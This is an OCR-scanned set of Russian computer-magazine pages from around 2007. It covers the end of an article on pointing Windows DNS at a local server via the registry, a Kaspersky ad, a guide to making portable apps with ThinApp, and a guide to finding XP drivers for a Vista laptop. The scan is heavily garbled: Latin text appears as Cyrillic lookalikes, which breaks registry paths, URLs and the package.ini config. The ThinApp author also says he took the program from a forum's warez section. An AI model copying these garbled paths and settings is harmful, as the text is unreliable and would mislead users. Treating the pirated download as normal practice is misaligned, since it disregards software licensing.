гда равный 1 27.0.0.1 ) в качестве основного. На первый взгляд кажется, 
что нет ничего проще! Находим в «Панели управления» папку «Сеть 
и удаленный доступ к сети», выбираем нужное сетевое соединение, в 
контекстом меню заходим в «Свойства», лезем в настройки протокола 
ТСР/ІР, переводим радиокнопку из положения «Получать адрес ВІМ5- 
сервера автоматически» в положение «Использовать следующие адреса 
ВЫБ-серверов» и пишем в нижеследующей графе «127...». И воттут-то 
нас ждет облом -с! ѴѴіпсІоѵѵз ехидно сообщает: «ІР-адреса, начинающиеся 
с 1 27, не являются допустимыми, поскольку они зарезервированы для 
адресов замыкания на себя. Укажите другое, допустимое значение в 
диапазоне от 1 до 223». 

Обладатели статических ІР-адресов могут просто махнуть рукой и 
прописать свой реальный ІР-адрес (который можно узнать с помощью 
штатной утилиты ірсопбд.ехе), однако как быть тем, у кого ІР-адрес 
назначается провайдером динамически и меняется при каждом 
входе в сеть?! Приходится прибегать к прямому редактированию рее- 
стра. Запускаем гедесПСехе (с правами администратора), захотим в 
следующую ветвь системного реестра: НКІ_М\5Ѵ5ТЕМ\СопІго15еі001\ 
БегѵісезМсрірХРагатеІегзМпІегІасезѴ где видим все имеющиеся у 
нас сетевые интерфейсы, а точнее, соответствующие им идентифика- 
торы вида {1 ЗВ988РР-8252-4Р2А-94СС- ВС36 Е90 ЕВ РАО}. Как найти в 
них нужный?! 

Поочередно открывая ветви идентификаторов один за другим, смотрим на 
поле ІЧатеБегѵег, в котором содержится ІР-адрес ВЫБ-сервера, назна- 
ченного провайдером. Если он совпадете ІР-адресом, выданным утилитой 
ПБІоокир.ехе.то, значит, мы нашли, что искали и меняем этотадрес на 
1 27.0.0.1 . Перезагрузка нетребуется. Все! С этого момента ВІЧБ-сервер 
провайдера отдыхает и все запросы идут через наш собственный локаль- 
ный сервер, проследить за активностью которого можно, кликнув левой 
кнопкой мыши по иконке Бтаіі НТТР сервера в системном трее. Откроется 
консольное окно, в которое сервер валитсвой лог. 
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Схема атаки на 0Ы5-сервер общим планом, без углубления в детали 




^ ЧТО В ИТОГЕ? 

Мы проделали большую работу. Самое время подвести итог: мы уста- 
новили свой собственный ОЫБ-сервер, не только защищающий нас 
от хакерских атак, не только ускоряющий ѵѵеЬ- серфинг, но еще и да- 
ющий возможность забыть о глюках 0Ы5-сервера, установленного у 
нашего провайдера. С другой стороны, мы получили мощное оружие, 
позволяющее атаковать других, например, в качестве 



показательных тестов на проникновение. Только вот делать это, 
естественно, нельзя. Несмотря на то что приватные локальные 
сети хороши какразтем, что большинство из них уже находится вне 
закона и работает без всякой лицензии, по голове ты рискуешь полу- 
чить в любой ситуации. Лично мыщъх предпочитает атаковать свои 
собственные виртуальные сети в порядке чистого эксперимента и 
ожидает того же от читателей, ц-ц 
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«ВЕЛИКОЛЕПНАЯ 7.0» 

с 3 сентября по 30 ноября 2007 года 



Суперпризы 

за суперзащиту 

Купите персональный продукт 
Антивирус Касперского 7.0 или 
Казрегзку Іпіегпеі Зесигііу 7.0 
в период с 3 сентября по 30 ноября 2007 
года и примите участие в розыгрыше 
призов от «Лаборатории Касперского». 

Для этого зарегистрируйте ваш продукт 
при активации. Розыгрыш будет произ- 
водиться по базе регистрации. Призеры 
будут объявлены в декабре 2007 года. 

Среди покупателей 
Казрегзку Іпіегпеі Зесигііу 7.0 
разыгрываются 7 НОУТБУКОВ 
и главный приз - ПЛАЗМЕННЫЙ 
ТЕЛЕВИЗОР. 

Призы для покупателей 
Антивируса Касперского 7.0 - 
7 КАРМАННЫХ КОМПЬЮТЕРОВ 
и 7 СМАРТФОНОВ. 
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Р0КТАВ1.Е — 

ВОТ ОНА РАДОСТЬ! 



СОЗДАЕМ ИЗ ЛЮБОЙ ПРОГРАММЫ ЕЕ Р0КТАВ1.Е-ВЕРСИЮ 



Ну какой дурак поставил сюда этот древний ОШсе? Куда делся интерпретатор Регі? Тут 
есть хоть один нормальный редактор кода? В такие моменты хочется пойти найти адми- 
на и надавать ему как следует: и ладно, что сам настроить ничего не может, так ведь и 
другим не дает. Чуть что — ограничение прав. Вот если на одной-единственной флешке 
был бы весь необходимый набор софта, тогда бы не приходилось тратить уйму времени 
на пустяки! Только вот найти рогІаЫе-версии приложений очень сложно, а зачастую даже 
невозможно. Ну что делать? Значит, будем портировать сами! Решено. 



ели внимательно изучить статистику загрузок, несложно 
заметить, что портированные версии программ пользуются 
ошеломляющим успехом и могут потягаться даже с ориги- 
нальными утилитами. Оно и понятно, куда приятнее иметь 
портативную версию программы при себе, нежели жестко зашитую в недрах 
системы. Все хорошо до тех пор, пока на флешку не потребуется записать 
что-то экзотическое. Ну, скажем, Регі-скрипт собственного сочинения или 
какое-то редкое приложение, для которого рогІаЫе-версии, естественно, 



не окажется. Есть призрачный шанс, что нужное приложение не шибко но- 
ровитзалезть внутрь системы, не покушается на реестр и, возможно, даже 
установится... Но куда вероятнее, что инсталлятор гордо выдаст ошибку, 
ссылаясь на недостаточность прав. Да чего таить, скорее всего, именнотак 
и будет. 

Теоретически можно отследить зависимости программы, посмотрев на то, 
что делаетустановщик во время инсталляции. Благо отследить изменения 
файловой системы и реестра легкое помощью небезызвестныхутилит 
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’ЫпзІаІІ. может искать изменения в различных местах системы, и ты их 
щлжен указать! 
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Зесьпроцесс проходитвтри этапа: 1] создание снимка девственной 
системы, 2] установка программы, 3) выявление появившихся изменений и 
компоновка роНаЫе-дистрибутива 



от5у5Іпі:егпаІ5 — Рііетоп и Педтоп, которые ныне принадлежат самому 
МісгозоИ Но и тут велик шанс обломаться, поскольку изменения в чужой 
системе производить, как правило, запрещено. Другое дело — результаты 
нашего небольшого исследования можно оформить в виде плагина для 
Вагі РЕ ВиіШег и собрать на базе ѴѴіпбоѵѵз свой ЫѵеСО с нужной програм- 
мой, но это все-таки не то. Перезапускаться в искусственное, достаточно 
тормозное и ограниченное окружение — это не самый лучший вариант. Тут 
нужно взять на вооружение инструменты покруче да посмелее. И, к счастью, 
такие есть. 

^ ТАЖЕ ВИРТУАЛИЗАЦИЯ, ТОЛЬКО В ПРОФИЛЬ 

Многие дельные разработки долго остаются закрытыми от широкой публи- 
ки. Иногда оттого, что у разработчиков напрочь отсутствуют РР-качества 
и они тупо не могут или даже не хотят распространять программу. Или же, 
наоборот, оттого, что меркантильная составляющая души подсказывает 
программеру, что свое детище нужно либо отдавать за деньги, либо вообще 
никак. И это как раз тот самый случай, который произошел с продуктом 
ТЫпзІаІІ. Еще во время написания довольно старого материала «Убойная 
флешка» я был наслышан о существовании подобной утилиты. Нотогда, 
к великому сожалению, даже сверхактивные поиски не привели меня к 
какой-либо рабочей и даже триальной версии программы. А вот сейчас она 
у меня в руках. Надо сказать, что просто закачать пробную версию с офсайта 
не получится: параноидальные модераторы отклоняли мою заявку, даже 
если в ней былоуказана абсолютно правильная информация обо мне. Я 
спам. Воттак. Виноваты сами: значит, буду использовать версию, ссылочку 
на которую я почерпнул в разделе «Варезник» форума \лл/ѵуѵ.ги-Ьоап±согп . 
Для того чтобы понять, зачем нужна и как работает эта утилита, давай 
разберемся: а что, собственно, мешает программам работать без установ- 
ки на других машинах? Причин на самом деле не так много: во-первых, 
программы не могутзаписать и считать свои настройки из реестра (ветку 
НКЕѴ_І_ОСАІ__МАСНІМЕ использует практически любое приложение), и, 
во-вторых, они не имеют права на чтение и запись в глобальные каталоги, в 
том числе в сЛргодгат бІез\ и системные папки Винды (5у5Іет32 и прочие). 
Если бы для приложения можно было создать песочницу (во взрослой тер- 
минологии — вапбЬох), то есть виртуальное окружение со своим реестром 
и файловой системой (и, само собой, сзависимыми папками и ключами), 
к которым программа могла, как ей нужно, обращаться (при этом не внося 
изменения в основную систему), то оно отлично работало бы и вне родного 
компа. Вот как раз такой контейнер и позволяет сделать программа 
Тб іп 51а II. 

Общий алгоритм портирования любого приложения заключается в сле- 
дующем. Надо: 



1) сделать слепоксистемы (зпарзбоі), записав текущее состояние файло- 
вой системы и реестра; 

2) установить программу, которую нужно портировать; 

3) сделать слепоксистемы после установки; 

4) выявить изменения в двух зпарвЬоТах; 

5) поместить файлы программы, а также все вспомогательные файлы (из 
системных директорий) и ключи реестра в специальный файл-контейнер, 
распространяемый в виде единственного ехе-файла; 

6) во время запуска такого бинарника на другом компьютере создать вирту- 
альное окружение вапбЬох для программы и воссоздать состояние системных 
файлов и реестра, которые видимы только для портированной программы. 

Вот, собственно, и все, попробуем сделать это на практике? 

Н «БОЖЕ, Я СТАЛА ПОРТАТИВНОЙ!» 

Установленная ТЬіпзіаІІ представляет собой набор файлов, втом числе 
бинарных. И сначала даже непонятно, что нужно запускать. Вот и хоро- 
шо, потому что запускать сейчас ничего и не надо :). Для портирования 
программы нам перво-наперво понадобится установить девственно чистую 
Винду (ѵѵіп2к или ХР). Зачем?! Вообще говоря, по этому поводу можно не за- 
морачиваться и портировать большинство приложений и на своей обычной 
системе с кучей установленных программ и многочисленных настроек«под 
себя». Но при этом в контейнер обязательно попадут посторонние ветки 
реестра и системные файлы, а это уже не естьхорошо. Болеетого, ТЫпзІаІІ 
практически моментально создает слепок чистой системы, вто время как 
наддавноустановленной ОС может корпеть по несколько минут. Или вот 
еще ситуация. У тебя на компьютере уже установлен .ЫЕТ-фреймворк, иты 
портируешь приложение, которое его использует. Естественно, файлы этой 
платформы в контейнер уже не попадут, и приложение уже не запустится 
на компьютере, где .ЫЕТ не установлен. Комментарии излишни. Поэтому я 
тебе все-таки рекомендую, и даже настоятельно рекомендую, не поленить- 
ся запустить какую-нибудь ѴМѵѵаге ѴѴогкзІабоп или бесплатный ѴМѵѵаге 
Зегѵеги потратить часок, чтобы установить ОС под виртуальной машиной. 
Специально для портирования приложений! 

Воттеперь приступим. Из всех исполняемых файлов, которые лежат в папке 
с программой, нам понадобится только один — ЭеІирСарІиге.ехе. Это гра- 
фический интерфейсдля консольных утилит (компиляторов виртуальной 
файловой системы и реестра ѴРТооІ/ѴРедТооІ, а также специального лин- 
ковщика ТІ_іпк), которые, собственно, и занимаются сборкой портирован- 
ных приложений. Рекомендую расшарить файлы из директории ТЫпБіаІІ, 
тогда к ним можно будет обратиться прямо из виртуальной машины (локаль- 
ная сеть с домашней ОС, скорее всего, будет настроена автоматически), 
набрав в адресной строке ІІЫС-адрес папки: \\5{ер\ТЫ5І:а II (например). Это 
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Выложить на диск 
сам ТЫпзІаІІ мы не 
можем полицензи- 
онным соображе- 
ниям. В ходе работы 
над статьей нашелся 
аналог- программа 
Мощрас. Вотее три- 
альная версия будет 
на ОМО. 




> Ііпкз 

ѵѵѵѵѵѵ.іЫп5Іа1.1.сот 
— официальный 
сайтТЫпБІаІІ, на 
котором выложена 
масса видероликов, 
демонстрирующих 
процесс портирова- 
ния приложений. В 
том числе и сложные 
случаи, когда при- 
ложение использует 
платформу .МЕТ, 

Заѵа и АсйѵеХ. 



самый лучший вариант, поскольку мы ничего не копируем на 
чистую систему, хотя ничто не мешаетэто сделать, перенеся 
файлы ТЫпзІаІІ каким-либо еще способом (через ту же самую 
флешку). 

Далее создаем первый слепок системы, то есть структуру, 
в которой содержится текущее состояние ОС без установ- 
ленных программ и приложений. Для этого запусти утилиту 
ЗеіирСарІиге и выбери Рге-іпБІаІІЭсап. Перед этим можно 
было бы указать диск и ветки реестра для сканирования, но 
обычно поумолчанию все выставлено правильно. На быстром 
компьютере этот процесс едва ли займет более 10-20 секунд. 
Теперь, когда сканирование системы завершено, можно 
приступить кустановке непосредственно портируемого 
приложения. Просто возьми инсталлятор и сделай все самым 
обычным образом (не бойся, даже если потребуется переза- 
грузка) с одним одним-единственным нюансом. Позаботься 
отом, чтобы установщик создал на рабочем столе или в меню 
«Пуск» ярлыки для запуска приложения. Если такой опции не 
предусмотрено, как, например, в случае с интерпретатором 
Асбѵе Регі, ярлык нужно создать самому. Это очень важно, 
поскольку именно так ТЫпБІаІІ определяет, какие из появив- 
шихся в системе бинарников нужно портировать! В случае же, 
когда у приложения нет инсталлятора, можно просто вручную 
скопировать файлы в нужную директорию (а на рабочем столе, 
естественно, создать ярлыки). Это тоже нормально. 

Теперь следующий шаг. В принципе можно было бы прямо 
сейчас приступать кповторному сканированию системы и 
созданию контейнера, но в этом случае приложение придется 
конфигурировать каждый раз заново. На фига нам такое 
счастье? Нетуж, предлагаю настроить все прямо сейчас, 
выставить нужные параметры. Допустим, если это браузер, 
то добавить закладки, установить домашнюю страницу, под- 
ключить к РІгеІох (а я использую именно его) все необходимые 
плагины (РігеЬид, ОоѵѵпІоасІІТ и прочие прелести жизни). И 
только после этого программе следует дать отмашку на заклю- 
чительное сканирование системы (кнопка РоБІ-іпБІаІІЭсап). 
Сразу по завершении в ТНіпБіаІІ/СаріигеБ появится папка 
с названием проекта. Если внимательно присмотреться, то 
можно заметить, что все содержимое — это различные файлы 
и папки, которые появились в системе после сканирования, а 
также файлы с ключами реестра. Тугже лежит фа йликЬиіШ.ЬаЕ 
Если ты обращался кТЫпБІаН по локальной сети, можешь 
смело приступать к его выполнению. В противном случае 
файлы придется переместить в реальную систему, туда, где 
была установлена ТЬіпБІаІІ. Выполнение ЬиіШ.ЬаІ запускает 



компилятор виртуального реестра, паковщик виртуальной 
файловой системой, а также специальный линкер, который со- 
берет все хозяйство в ехе-файл. И в результате получаем что? 
Правильно, портированную версию приложения. Можешьтут 
же попробовать ее на другом компьютере и плясать от радости 
до упаду:). 

Н ОХУЖ ЭТИ ТОНКОСТИ 

Тут надо сказать, что на выходе может получиться несколько 
ехе-файлов. Это значит, что во время установки приложения 
было создано несколько ярлыков и портированные версии, 
соответственно, скомпилировались для каждого бинарника. 



из нос соседу! 

113 — это новый стандарт форматирования ІТЗВ-накопите- 
лей, в который заложен принцип «подключил и работай». 
Сразу после подключения флешки в системе появляется 
два раздела: один (небольшой) в виде СЭ-КОМ, другой 
(большой) как съемный накопитель. На первом размеща- 
ется утилита ЬаипсЬРасІ, представляющая собой удобную 
панель для запуска программ. Поскольку раздел опознает- 
ся операционной системой как СО-К.ОМ диск, ЬаипсйРас! 
запускается автоматически. Своим видом ЬаипсЬРас! 
сильно напоминает системное меню «Пуск», только здесь 
слева находится список программ, которые можно запус- 
тить с флешки, а справа — список возможных действий 
для управления диском и программами. Остальная часть 
флешки, определяющаяся как сменный накопитель, своей 
работой ничем внешне не выделяется. Помимо автоза- 
пуска ЬаипсЬРаб, технология 113 позволяет программам 
работать в своем собственном окружении без предвари- 
тельной инсталляции. Адаптированные для ИЗ прило- 
жения вправе взаимодействовать с файлами и реестром 
хост-машины, как если бы были установлены в систему. 
При этом все внесенные ими изменения откатываются, как 
только флешку вытаскивают из компьютера. К сожалению, 
все это возможно только в том случае, когда разработчики 
конкретной программы позаботились о совместимости с 
платформой 113 (ЭБЬСдля программеров доступен на сайте 
ѵѵѵѵѵѵ.иЗ.сот) . 
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Разныеуровни изоляции портированного приложения 




Как правило, необходимости в этом нет, но откуда жеТЫпз*аІІобэтом 
знать? Предлагаю ей это сообщить и заодно рассмотреть дополнительные 
нюансы портирования приложений. При всей простоте процесса, однако, 
предусмотрена масса дополнительных настроек, которые задаются в 
текстовом конфиге раскаде.іпі. Вот пример: 

[ВиіІйОрДіопз] 

ОиДБіг=Ьіп 

Зап<ЗЪохЫате=геасІег7 

[АсІоЪеВоѵтІоасІМападег . ехе] 
Зоигсе=%РгодгатРі1езВіг%\Соштоп 
Рі1ез\Ас1оЪе\Е5В\А<іоЬеВоѵт1оасІМападег . ехе 
КеасЮп1уВаба=Ъіп\Раскаде . го . кѵг 

[АсгоЕс132 . ехе] 

Зоигсе=%РгодгашРі1езВіг%\А(ЗоЬе\АсгоЬаб 7 . 0\Кеасіег\ 
АсгоК.с132 . ехе 

ЗІіогДсиб^АсЗоЬеВоѵтІоасЗМападег . ехе 
[геасЗег_з1 . ехе] 

Зоигсе=%РгодгашРі1езВіг%\А(ЗоЬе\АсгоЪаб 7 . 0\РеасЗег\ 
геас!ег_з1 . ехе 

ЗІіогДсиД^АйоЬеВоѵтпІоасЗМападег . ехе 

Несложно заметить, что каждый ехе’шникописывается в своей собствен- 
ной секции. Все ненужное (в данном случае это секции [геабег_з1.ехе] и 
[АбоЬеОоѵѵгіІоасІМападег.ехе]) можно просто отсюда убрать и запустить 
процесс сборки контейнера (ЬиіІб.Ьа*) заново. Теперь будет создан только 
один — нужный нам — ехе’шник. 

Помимо этого, существует еще масса других параметров, которые влияют 
нетолько на окончательный вид портируемого приложения, но и на его 
работу в чужой системе. Разберем несколько наиболее значимых из них. 
СотргеззіопТуре — с помощью этого параметра можно включить ком- 
прессию для файлов внутри контейнера. Поумолчанию сжатие файлов 
отключено: 

[Сошргеззіоп] 

СотргеззіопТуре=Ыопе 

Для того чтобы его активировать, необходимо в качестве значения пара- 
метра указать Раз* или 5таІІ для соответственно быстрого или медленного, 
но более эффективного сжатия. Воттак: 

[Сошргеззіоп] 

СошргеззіопТуре=Раз1: 

;СотргеззіопТуре=Зта11 



Еще один важный параметр — это тип изоляции (Оігес*огуІзоІа*іопМосІе), 
влияющий на поведение портированного приложения в системе. По 
умолчанию он выставлен в значение ѴѴгііеСору, позволяющее читать 
любые файлы с компьютера, нозапрещающее вносить в них изменения. 
Причем если системный элемент (файл или ключ реестра) существует как в 
реальной, так и в виртуальной системе, то программа увидит исключитель- 
но виртуальный. В рамках раскаде.іпі это выглядит так: 

[ІзоІаДіоп] 

ВігескогуІзо1абіопМос1е=Мгі1:еСору 

В случае необходимости его можно выставить в Мегдеб, и тогда програм- 
ма сможет обращаться напрямую к реальным файлам в системе, а новые 
файлы будут сохраняться на жестком диске. Третий вариант— РиЕ — реко- 
мендуется использовать, когда приложение нужно полностью изолировать 
от реальной системы. Вся работа будет осуществляться исключительно в 
виртуальном окружении (запсІЬох’е).іні 



Когда приложение 

портировать 

невозможно 

Несмотря на то что большинство приложений отлично поддается 
портированию с помощью ТЫп5*а11, встречаются досадные, но вполне 
понятные ситуации-исключения, когда переносную версию программы 
сделать невозможно: 

• Приложение использует для своей работы предварительно уста- 
новленный системный драйвер. А это практически все антивирусы, 
файрволы, УРИ-клиенты. Чудес не бывает, и в чужой системе без прав 
администратора установить такие вещи, естественно, невозможно. 

• Программа основана на ОСОМ-сервисах. ТЫпзшП изолирует СОМ 
и БСОМ, поэтому к сетевым приложениям, которые используют эту 
технологию, можно обратиться только с локального компьютера. 

• В приложении используются глобальные ОБЬ-хуки. Некоторые при- 
ложения используют АРІ-функцию 8е*ѴѴіпсІо\ѵ5НоохЕх для того, чтобы 
инжектировать ОІХ сразу во все процессы системы (например, для того 
чтобы перехватить активность клавиатуры и мыши) . Такой фокус в 
окружении ТЫпзГаП не сработает. 
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АДАПТАЦИЯ 



КАК УСТАНОВИТЬ НА НОВЫЙ КОМП ХР ВМЕСТО ѴІ5ТА 



Пару недель назад мы с приятелем пошли в магазин за новым ноутом. Каково же было 
наше удивление, когда мы обнаружили, что на всех новых моделях стоит ѴѴІпсІаѵѵз Ѵізіа, 
да еще в весьма ущербном Ноте-варианте. Менеджер по секрету шепнул, что нужных 
драйверов для перехода с Висты на ХР мы, скорее всего, не найдем, и оказался прав! Но 
даже без официальной поддержки производителя я за ночь поднял на ноуте полноцен- 
ную ѴѴІпХР без каких-либо изъянов. Как мне это удалось? Садись поудобнее, мой рассказ 
будет долгим, но интересным. 



В ЗАЧЕМ ТЕБЕ ЭТО 

На самом деле проблема не исчерпывается только установкой ѴѴіпсІоѵѵзХР 
на новом ноутбуке. Привыкшие ктехнологии РІид’п’РІау и драйверам из 
коробки, многие из нас оказываются абсолютно беспомощны в поисках 
нужного драйвера. И это действительно не всегда такуж просто. Поэтому 
рекомендую тебе прочитать статью до конца, даже если покупка ноутбука в 
твои ближайшие планы не входит! Представьтривиальную и одновремен- 
но неприятную ситуацию: ты переустановил систему, а потом вспомнил, 
что коробку с драйверами пол года назад съела твоя собака (была изъята 



доблестной милицией при обыске/случайно сломана твоим младшим 
братом/безжалостно использована как пепельница на недавней пьянке 
— короче, нужное подчеркни сам). Считай, что эта статья — твое пособие по 
поиску любых, даже самых изысканных, драйверов. Нухватитпрелюдий, 
пора сбираться в путь! 

г ЧТО МЫ ИМЕЕМ 

Со стороны производителей ноутбуков не совсем честно комплектовать 
все свои последние модели новомодной ѴѴіпсІоѵѵв Ѵізіа, не предоставляя 
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Форма поиска на ѲгіѵегѲиісІе 



ХР, ѴІ5ТА — какая нафиг разница?! 
Лично я себе на ноутбук первым 
делом поставил РгееВ5Ѳ 6.2. Для 
моей работы — идеально! 



Да, а мне вот в магазине сразу 
сказали, что ХР на мой новый 
ноут не поставить. Наверное, 
перейду на ІІЬипІи. 




драйверы для отката на старые системы. Но тут и их, и компанию МісгозоЙ 
можно понять: это бизнес. Но наш комфорт к их бизнесу не имеет никакого 
отношения, поэтому давай- ка разберемся, как эти ограничения обойти. 
Поясню, что рассказывать о поиске и установке драйверов я буду на приме- 
ре миниатюрного лэптопа 5опу ѴАІО ѴѲІЧѲ1 1 с предустановленной ѴѴіпсІоѵѵз 
Ѵізіа Ноте. Перво-наперво ждем 5 минут, пока Виста не загрузится, и идем 
в «Панельуправления -> Администрирование -> Управление компьюте- 
ром -> Диспетчер дисков». Там смело выбираем «Сжать том» и выделяем 
некоторую часть под второй логический диск. Затем форматируем его и 
наделяем буквой Ѳ. Все! Теперь можно перезагружаться и ставить на борт 
ѴѴіпХР. Через полчаса мы будем иметь голую Винду без каких-либо драй- 
веров (даже в 5Р2ты не обнаружишь поддержку дров твоей системы — как 
корова языком слизала). Самое время это исправить. 

^ ЕСЛИ ДОЛГО МУЧИТЬСЯ... 

Я специально не стал удалять Висту. Сейчас объясню почему. Если ты 
зайдешь на дискС:,то, возможно, обнаружишь в корне папку бгіѵегэ (ха- 
рактерно для ноутов 5опу Ѵаіо). Этот каталог поможетте бе определить тип 



практически всех устройств в системе. Мне повезло — папка существова- 
ла, однако установить драйвер для ѴѴіпХР получилось лишь для ВІиеІооіЬ 
(установщик остальных дров трехэтажно матерился на текущую 05). Но я 
даже и не думал отчаиваться. Помни, что любой ноут собирается из вполне 
известныхжелезок, и если производительлэптопа не выложит дровишки, 
то это сделает кто-то другой :). Например, фирма-создатель определенной 
железяки. Понял, кчему я клоню? Совсем необязательно искать драйвер 
для конкретной модели ноутбука (да и вряд ли ты его найдешь, проверено 
на Ѵаіо :)). Нужно лишь определить все системные устройства, а затем 
произвести поиск по каждому из них, уже используя критерии, заданные 
производителем. А любезно помогут нам в этом программы 5і5оЙ Запсіга 
( ѵѵѵѵѵѵ.зізойѵѵаге.со.ик ) и ЕѵегезІ: ( ѵѵѵѵѵѵ.іаѵаіѵз.сот ). Лично я отдаю пред- 
почтение второй софтине, потому как Сандра, ввиду своей шараварности, 
не открывает все карты, а только и знает, что просит себя купить. Версия 
Еѵегезі Ноте, напротив, является триальной, поэтому отдается пользова- 
телю без всяких ограничений. 

Итак, запускаем Еѵегезі: Ноте и смотрим, что за железо у нас на борту. В 
моем случае определился ВІиеІооіЬ (еще бы, ведь драйвер для него яуже 
поставил) и чипсет. Это хорошо, потому какбазовые дровишки (материн- 
ка, видеокарта, поддержка двухъядерности, если таковая имеется ит.п.) 
поставляются именно с драйвером для чипсета. На купленном лэптопе 
базисом оказался чипсет Іпіеі 6МА950, и я, записав эти ключевые слова, 
продолжил смотреть. Далее обнаружилась беспроводная карточка типа 
Іпіеіс дополнительными ключевыми цифрами, сетевушка отУикоп и 
странно определившаяся звуковуха с гордым названием «Реаііек $54!». 
Осталось найти драйверы под вышеназванные вещи, чем я тут же и занял- 
ся. Естественно, пока я не притянул за уши драйвер ѴѴі-Рі адаптера, все 
нехитрые манипуляции по поиску дров пришлось выполнять, используя 
стационарный комп, стоящий в нескольких метрах от ноута. 

г ПОИСК ДРАЙВЕРОВ, ИЛИ «ѴѴЕІ.С0МЕ ТО 0КІѴЕК6Ш0Е.С0М» 

Я не стал искать дрова на официальном сайте 5опу, потому какзаранее 
знал, что они там будуттолько под ѴІ5Іа Ноте. Можно было бы попробо- 
вать погуглить, но и этот занимательный процесс, обещавший затянуться 
на многие часы без гарантии конечного результата, я решил отложить. 

Я пошел прямо в святилище драйверов — на бгіѵегаиісіе.сот . Этот сайт 
содержит копилку дров как для старых, так и для новых девайсов (помнит- 
ся, в далеком 2003 году с помощью этого чудесного ресурса я излечивал 
умершие В 105 от воздействия ѴѴІЫ.СІН). 

Пол года назад я купил годовой доступ на ОгіѵегѲиісІе, так как меня задол- 
бала реклама. Но тебе рекомендую обойтись бесплатным аккаунтом, ведь 
чтобы скачать 10 драйверов, совсем необязательно выкладывать $30. Итак, 
заходим в «5еагсб-> 5ітр1е» и натыкаемся на форму поиска. Далее указы- 
ваем в меню, что хотим искать драйвер для чипсета под ѴѴіпХР, а в текстовую 
формочку забиваем ключевые слова: «ІпІеІѲМА950». Спустя 10 секунд, 
сервер ОгіѵегѲиісІе плюнет в тебя многочисленными результатами. Выби- 
райте варианты, которые появились в самом верху, так какза них проголо- 



Учим понимать 

5АТА-ДИСКИ 

Опыт нашего автора КОісГа подсказывает, что проблемы могут возник- 
нуть не только с поиском и установкой драйверов, но еще и, в принципе, 
с установкой ѴѴіпсіоѵѵз ХР на новые ноутбуки. «Программа установки не 
обнаружила жесткие диски на данном компьютере» — это та невнятная 
ошибка, которую выдает установщик в этом случае. А все из-за того, что 
в буке используется новомодный 5АТА жесткий диск. Что же делать? 
Научим ХР такие харды обнаруживать. Для этого нужно поступить сле- 
дующим образом: 

1 . Скопировать все файлы с установочного диска ХР на винт своего 
ноутбука. 

2. Скачать с сайта ІпГеІ Гѵѵѵѵѵѵ.іЩеІ.сот) архив с обновлениями для чипсе- 
та (или взять его на нашем ПѴЛ) . 

3. И с помощью тулзы пЫге (ѵѵѵѵѵѵ.пійеоз.сот) создать новую сборку (то 
есть загрузочный 150-образ), в который помимо стандартных файлов 
включить апдейты от ІпСеІ. 

4. Записать из этого образа загрузочный диск и установить систему. 
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> ІП^О 

Если в твоем бутсек- 
торе прописаны две 
системы, то знай, что 
добрососедски они 
сосуществовать не 
смогут: при каждой 
загрузке ѴѴіпХР на- 
прочь слетают точки 
восстановления 
Ѵівіа. Но, к счастью, 
не наоборот! 




> СІѴСІ 

Надискеты найдешь 
пару программ для 
работы с бутсе кто - 
ром Ѵівіа, програм- 
мы Еѵегезі: и БіБоіі: 
Бапсіга и, конечно 
же, клиент для 
ОгіѵегБсап с офици- 
ального сайта. 




совало большинство человек, а значит, эти драйверы наиболее 
стабильны. Скачиваем файлики себе на диск, устанавливаем 
и перезагружаемся. Ура! Теперь в списке оборудования мы за- 
мечаем, что неизвестныхустройств стало на порядок меньше, 
а твой процессор корректно отображается в диспетчере задач 
(по крайней мере у меня до установки драйвера чипсета систе- 
ма не могла правильно определить даже частоту камешка). 

г ПЕРВЫЕ ПРОБЛЕМЫ 

Далее я без проблем нашел драйвер для беспроводной ѴѴі-Рі 
карточки типа Іпіеі и уже было подумал, что подобным образом 
поставлю дровишки и для остальных устройств. Ага, конечно! 
Приустановке очередного драйвера под сетевушку Ѵикоп меня 
поджидал жирный облом. Нет, я нашел драйвер (точнее, даже 
несколько драйверов), успешно слил их себе на хард, но при 
установке система грязно выругалась. Мол, в заданной тобой 
папке нет драйверов, и вообще я стобой не играю :). Это меня 
немного удивило и на секунду даже показалось, что Еѵегезі; 
поймал глюка. Но, запустив запасную БізоЙ Бапсіга, я увидел... 
тотже самый тип сетевухи. Если на модем я еще могзабить.то 
N10 в моей работе была незаменимым девайсом! 

Я потратил полчаса и выкачал все драйверы, что были в 
закромах Огіѵегбиісіе. Результат был нулевым — система, 
будто заколдованная, выдавала мне сообщение, что драй- 
вер для устройства обнаружен не был. И тут меня осенило. Я 
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вспомнил про заветную папку сДбгіѵегБ, которая осталась 
от Висты. Зайдя в нее и выбрав каталог Ѵикоп, я кликнул 
на іп^-файл. Хотя он и был исключительно Вистовый и ну 
никак не могустановиться на ѴѴіпХР, я посмотрел версию 
драйвера — ѵі 0.22.4.3. Однако те драйверы, что я стянул 
с Огіѵегбиісіе, не превышали девятого релиза. Мораль в 
том, что всегда нужно проверять актуальность драйверов, 
которые устанавливаешь в систему. 

На этот раз я решил посетить официального производителя 
устройства. Пробив через Гугл компанию-производителя, 
я выяснил, что сетевушки Ѵикоп изготавливаются фирмой 
Магѵеіі. Мне ничего не оставалось, какзайти на ѵѵѵѵѵѵ.гпагѵеЦ. 
сот/ргобисІБ/рссопп/уикоп/іпсІех.ІБр . задать критерии поиска 
драйвера и получить ссылку на свежий архив. Он, какты, 
наверное, догадался, установился без приключений. 

^ СКАНИРУЕМСЯ ПО ПОЛНОЙ 

Еще одна фишка ресурса ОгіѵегѲиісІе, о которой я тебе расскажу 
на примере, называется ОгіѵегБсап. Суть ее в следующем: 
пользователю сайта предлагается скачать программулибо 
запустить АсбѵеХ-компонент, который полностью сканирует 
системные устройства и выдает подробный отчет об обнару- 
женных девайсах. Если на сайте присутствует драй вер под 
железку, тебе предлагают его скачать и установить, сводя к 
нулютвои усилия, которые могли бы быть затрачены на поиск. 
Удобно? Несомненно! Сейчас мы проверим силу и могущество 
ОгіѵегБсап’а на практике. 

Я не стал заморачиваться, а просто разрешил запуск АсбѵеХ. 
После недолгой загрузки модуля передо мной открылось 
окно, в котором, как в «Матрице», замелькали строчки. Спустя 
несколько секунд появился отчето сканировании, в котором 
присутствовала еще пара драйверов, не определившихся 
ЕѵегезГом, — для ТоисЬРаб и Сопехапі Мобет. Да-да, этоттот 
самый модем для диалапа, который давно на фиг никому не 
нужен, но назло всем живет в каждом ноуте :). 

«Уже что-то!» — сказал я себе под нос и нажал на ссылку для 
установки драйвера. Как ни странно, оба драйвера встали 
как родные — втрее появился привычный значокоттачпада, 
а в системе поселился новый модем, притащив с собой 
